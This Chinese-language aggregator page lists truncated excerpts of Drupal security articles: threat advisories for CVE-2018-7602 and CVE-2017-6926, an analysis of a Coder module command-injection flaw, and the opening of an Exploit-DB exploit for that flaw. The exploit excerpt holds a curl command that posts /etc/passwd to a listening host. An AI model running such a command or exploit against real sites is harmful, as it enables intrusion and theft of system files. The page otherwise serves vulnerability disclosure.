记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

【威胁通告】Drupal远程代码执行漏洞 CVE-2018-7602

阅读: 35当地时间4月25日,Drupal发布安全通告称有1个高危漏洞(CVE-2018-7602)影响Drupal 7.x和8.x等版本,攻击者可以通过不同方式利用该漏洞远程执行代码。Drupal官方表示此漏洞和之前的漏洞CVE-2018-7600相关,并已发现有攻击者在利用。CVE-2018-7600漏洞分析CVE-2018-7600 Drupal 7.x 版本代码执行Drupal远程代码执行漏洞(CVE-2018-7600)分析 绿盟科技威胁情报中心(NTI)显示Drupal在全球近1年来有超过12W用量,主要集中在美国地区。Drupal已经发布相关版本进行了修复。相关链接:https://www.drupal.org/sa-core-2018-004https://www.drupal.or
发布时间:2018-04-26 15:05 | 阅读:109145 | 评论:0 | 标签:威胁通报 CVE-2018-7602 drupal drupal 8 漏洞分析 漏洞

【漏洞分析】Drupal 8 – CVE-2017-6926漏洞详解

阅读: 80近期,著名的Drupal CMS网站爆出7个漏洞,其中1个严重漏洞CVE-2017-6926,具有发表评论权限的用户可以查看他们无权访问的内容和评论,并且还可以为该内容添加评论。绿盟科技于上周发布了《 Drupal下周将发布重要安全补丁威胁预警通告 》。本篇文章对Drupal 8 – CVE-2017-6926漏洞进行了详细分析。文章目录CVE-2017-6926 漏洞详情CVE-2017-6926 利用验证CVE-2017-6926 漏洞修复CVE-2017-6926 漏洞详情先看下drupal官网的通告:https://www.drupal.org/sa-core-2018-001有发布评论权限的用户,可以查看他们无权访问的内容和评论。并且还可以为此内容添加评论。想要触发这个漏洞,必
发布时间:2018-04-03 15:05 | 阅读:151406 | 评论:0 | 标签:威胁通报 drupal drupal 8 漏洞分析 drupal 漏洞 drupal8 漏洞

【预警通告】Drupal下周将发布重要安全补丁

阅读: 19北京时间3月23日,Drupal官方发布一则声明表示将于当地时间3月28日18:00 – 19:00(北京时间3月29日凌晨2:00 – 3:00)发布重要更新,修复一个严重的安全漏洞,涉及Drupal 7.x, 8.3.x, 8.4.x和8.5.x版本。由于该漏洞十分严重,攻击者能够极快的利用该漏洞进行攻击,因此Drupal安全团队建议用户下周预留出足够的时间完成更新升级,进行防护。注:Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。相关链接:https://www.drupal.org/psa-2018-001文章目录受影响的版本不受影响的版本解决方案声 明关于绿盟科技受影响的版本Drupal version
发布时间:2018-03-23 20:05 | 阅读:83537 | 评论:0 | 标签:威胁通报 drupal drupal 漏洞

Drupal Coder模块命令执行漏洞分析

0x01:前言 这个漏洞是drupal的coder模块中,对dir参数没有过滤,导致的命令执行,其实挺早就看到这个洞了,一直也没时间去写,现在已经不新鲜了,安恒的博客上分析已经有了,他们是从poc角度分析的,我这里就对这个漏洞从网站代码的角度详细说一下。 0x02:漏洞分析 在文件sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php中 一开始就对$path进行赋值,下面所有的操作都是跟$path有关的,我们来看看$path是怎么来的,跟进extract_arguments()函数 发现$path其实是$_GET[‘file’],这个file参数是我们可控的,看看$path接下来怎么用到了,接着看 这里代码的本意应该是取一个已
发布时间:2016-08-24 23:40 | 阅读:112715 | 评论:0 | 标签:代码审计 Coder Drupal Drupal漏洞 poc 模块命令执行 漏洞分析 漏洞

Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)

具体的分析过程。https://www.exploit-db.com/docs/40244.pdf <?php # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) # https://www.drupal.org/node/2765575 # by Raz0r (http://raz0r.name) # # E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5 $cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd"; $host =
发布时间:2016-08-18 21:40 | 阅读:72586 | 评论:0 | 标签:PHP Drupal exp

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云